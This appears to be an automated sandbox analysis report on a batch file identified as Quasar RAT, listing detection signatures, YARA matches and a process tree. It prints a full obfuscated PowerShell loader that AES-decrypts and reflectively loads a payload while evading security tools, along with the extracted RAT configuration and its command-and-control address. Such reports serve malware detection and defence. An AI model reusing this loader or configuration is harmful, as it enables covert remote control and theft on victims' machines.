Edit tour
Windows
Analysis Report
deneme.bat
Overview
General Information
Detection
Quasar
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara detected Quasar RAT
Renames powershell.exe to bypass HIPS
Yara detected Generic Downloader
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- cmd.exe (PID: 2948 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\denem e.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4652 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - mode.com (PID: 5932 cmdline:
Mode 60,3 MD5: 1A3D2D975EB4A5AF22768F1E23C9A83C) - certutil.exe (PID: 6972 cmdline:
CERTUTIL - f -decode "C:\Users\ user\Deskt op\deneme. bat" "C:\U sers\user\ AppData\Lo cal\Temp\a llah.bat" MD5: EB199893441CED4BBBCB547FE411CF2D) - allah.bat.exe (PID: 6956 cmdline:
"allah.bat .exe" -nop rofile -wi ndowstyle hidden -ep bypass -c ommand $lI LxN = [Sys tem.IO.Fil e]::('txeT llAdaeR'[- 1..-11] -j oin '')('C :\Users\us er\AppData \Local\Tem p\allah.ba t').Split( [Environme nt]::NewLi ne);foreac h ($vOhpq in $lILxN) { if ($vO hpq.Starts With(':: ' )) { $OHwZ k = $vOhpq .Substring (3); break ; }; };$PP hGD = [Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')($OHwZk) ;$YGMef = New-Object System.Se curity.Cry ptography. AesManaged ;$YGMef.Mo de = [Syst em.Securit y.Cryptogr aphy.Ciphe rMode]::CB C;$YGMef.P adding = [ System.Sec urity.Cryp tography.P addingMode ]::PKCS7;$ YGMef.Key = [System. Convert]:: ('gnirtS46 esaBmorF'[ -1..-16] - join '')(' 6pNVYWetf4 chAWo/pEbN aRZ3xRLeWm BPF3OumGmD Vww=');$YG Mef.IV = [ System.Con vert]::('g nirtS46esa BmorF'[-1. .-16] -joi n '')('lxQ sLBFdvl0gy eVxt5ivJg= =');$blbua = $YGMef. CreateDecr yptor();$P PhGD = $bl bua.Transf ormFinalBl ock($PPhGD , 0, $PPhG D.Length); $blbua.Dis pose();$YG Mef.Dispos e();$MkYmI = New-Obj ect System .IO.Memory Stream(, $ PPhGD);$wt LBU = New- Object Sys tem.IO.Mem oryStream; $JeXHz = N ew-Object System.IO. Compressio n.GZipStre am($MkYmI, [IO.Compr ession.Com pressionMo de]::Decom press);$Je XHz.CopyTo ($wtLBU);$ JeXHz.Disp ose();$MkY mI.Dispose ();$wtLBU. Dispose(); $PPhGD = $ wtLBU.ToAr ray();$weW pP = [Syst em.Reflect ion.Assemb ly]::('dao L'[-1..-4] -join '') ($PPhGD);$ BDLvJ = $w eWpP.Entry Point;$BDL vJ.Invoke( $null, (, [string[]] (''))) MD5: 95000560239032BC68B4C2FDFCDEF913)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Quasar RAT, QuasarRAT | Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult. |
{"Version": "1.4.1", "Host:Port": "74.234.104.236:3131;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c60dc807-eaae-43be-9bb5-d598c7ab3dad", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "QkrG1hrlPre4ELMGpY9VYUHNOoORaPrBaHOp0CYrLIPMR+5cUmlROjz9Udd+vkXFOJEpFXADJds5arUUD6SxXlBwSKE8zfsNw+U8P2e//dux99J83x0AVxAwFSHO/o7DRK2sA1imzXKM0/UdruohOUW9v7k4IzizqjklFzvm3xQniTnCG7JZzn7HsnH4i3BsBn0Ir6Q4QIfhFtv8aVA+tgqM5UrCTl8xr1nhSq+Rto87G9H7TNOydNEgLULlJt19Yujn8vGhoTJOVXhyQAlcpA5suYauo4PuhJMV4fRhaFqK1z+pJIe73OoWWO2La70/DIjQdFGWiM+9t+LQ7AuuiVQDXqjZ5VuFMEatd7yImwQ+MI+3HikoNCejHoquP1TjeugPLg5fuaxOIf8BGtU3Bl6zNeZf5eRwUKclMh90b1/S455jE6LJ+ak61xkR3yKSY67v1gUrfQzY4cXrD4e7aG711nqKD0PbyPtPUZlC4Sr8kpWVriUQ1otLmkZIxrbKHiy2tiC/p/CWkmEu7CANNZbLYG0512HfSvEMSE/t8MFcDKOluxc7S+bEBAlTW9UTB4Y4aDZ8QuaJqjn28VrrAR+p0QmypnDo0FOnmJ13O73QjMbWOD83IkJOR8zesXzE5FfQgmEu+O5Wz3tOkoVdw9sQX/Oc+TrzZvb9KYzUJpw=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAOlTpo8LWfXRZIepKFV3RzANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTIzMDUyMDE4NDcwOFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAkc9l37JeZdDNiK5Nd7sqsX48TrYGmt8wpMOudDbHsJ9jQCTkD3mRy+BXeSJTOBGjzFaic5W8Wd5evNwi1sjsiTRo+0jGfXHsSV2LHHrUlOJVo/n0Jeyn+tk5+JrbQuMQTi8nIxoNIQBH26JldwOD4NGtk8JtnvAEj3s6jsqTszNBdzX9eUdlSmDF7C8Gs7MSO8aOFFcbxseOfRiKVx6J2C1kUurANTYxDnW+FW3+f0ES9sVVyMjcJVG3q83hTg/8wCLj5/z+D+j81PvtbaRtFbBkOtoMP8HeJtKZl9N7lS1WDO1bHRsTyaE71ZkbuUjtCRa87TvYyq8zKiHlklIPyF/JDaZJqC/R0Mp+oseIISooumlhSjTvOG981/dx5/bsf+zTG80KUf7jbefORcOAbf/kCzOhJ6QxM6aSKZmo7cADVmDdc3L5y6Pd1DDGkSUgyepeZ0dbNmiftNtZtIrWg8D/vJQBmWfTZtgNTL9sbgXVlNUc2kQIwkI1U6pE8XWbSSl60SqwkO+kOMuL7byhuefKmAUQGFbwh6Bsoao9Qq3WOEnKpwh6WaOlw4Yq6aznlAZ4HnUCWpqyQOj5E5wXMc2BxsDaP98UhH3oB/osvDjxGhEXuMsySisfrsrZr0nMhUCJR+1UfKhZFf2W1OOvCS2gLeQwX6S9P240E+FOIBUCAwEAAaMyMDAwHQYDVR0OBBYEFNjjH99zEKAJrNI0wsELubp4dsr7MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAA9p4WnELDlsxMW4J6yYbMgpN0bCtHsTyILqWvwXfpjC884kfbVp5yEKrtXvtlnmldsRTWG9VBt8KvHqcW4TKAOiFJQAJ0b0i5mjFhFv5KNfj1pCc9qEmxx9eEtB0jemRwJHWEgqatkdlYh5WMpFaeOidZ/pdD7gEYQzK1uKsO57JIKoI6288Af2gVfddm/en0dzemjQwhwlvqRaxZRy+IGrhAP2JYYib0TGpwt1C6n9gdpmd5YMksShUCRPD7qby/Hvppuyj/RolEELCN9KHJWVEBDTnPdZi4nGCe45CsG6mKQ33Ad2vmIQ1OJztrjGWs4n6smcz6EpX3zP41UfrHktiCTSfJe3zIO7p0M/xvITAUKX2MMLgZVGo4e2WYlXiCle1cH2yg66+w4k0QHsY0qS+lMf3SC7Ea8CxkgTQkp173Ztxbi2PFTUmhPVYboiHBmug0Ds/jDAmv4Y3Br3bePcy3bmhBeiFGA7uQ4FQ5z6ew2PEIlZErD0z+41a2rMlEA8PkaxfPSmvVTBFT7jT8aJidXy9WLrGCFuokwaW47d6r7P50Hn6w5CT8EAeR5La239+oVVRGhEZsNDqM/Kcd/BV8dk7grMJgqhStHkl4+3gAipCnd6S7g6glUMUjSnxV7yCTb3jcVD0Z+4vEnujYFzM9IZy4BQL6NN994l1+6d"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth (Nextron Systems) |
| |
JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen |
| |
MALWARE_Win_QuasarStealer | Detects Quasar infostealer | ditekshen |
| |
Click to see the 4 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth (Nextron Systems) |
| |
JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen |
| |
MALWARE_Win_QuasarStealer | Detects Quasar infostealer | ditekshen |
| |
Click to see the 13 entries |
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |